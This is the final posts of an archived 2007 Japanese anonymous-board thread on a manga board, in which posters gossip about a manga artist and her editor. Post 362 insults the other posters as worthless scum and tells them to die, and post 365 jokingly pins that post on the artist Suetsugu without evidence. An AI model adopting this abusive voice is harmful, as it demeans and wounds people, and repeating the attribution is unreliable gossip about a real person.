それでもデビュー当時はそんな事考えてなかったんだと思いたいが。

360 :花と名無しさん:2007/01/24(水) 22:12:06 ID:???0
担当とは仲が良いらしい。

361 :花と名無しさん:2007/01/24(水) 22:35:48 ID:???0
今も?

362 :花と名無しさん:2007/01/24(水) 23:36:14 ID:???0
おまえらは、しょせんネット上だけでエラソーな事言って、社会にも出れないし、出ても何も言えないクズ。
クズだけに吠えてるだけ。逝ってよし!氏んでよし!生きてるだけ無駄なやつら



363 :花と名無しさん:2007/01/24(水) 23:49:38 ID:???0
>>362
ネット上だけで吠えてるクズを体現ですかw
ご苦労様。

364 :花と名無しさん:2007/01/24(水) 23:55:00 ID:???0
362と似たようなカキコをクッキースレで見た。
盗作してる漫画家とかですかね。

365 :花と名無しさん:2007/01/25(木) 00:45:50 ID:???O
>>362は末次の別の人格むぐー。

96 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)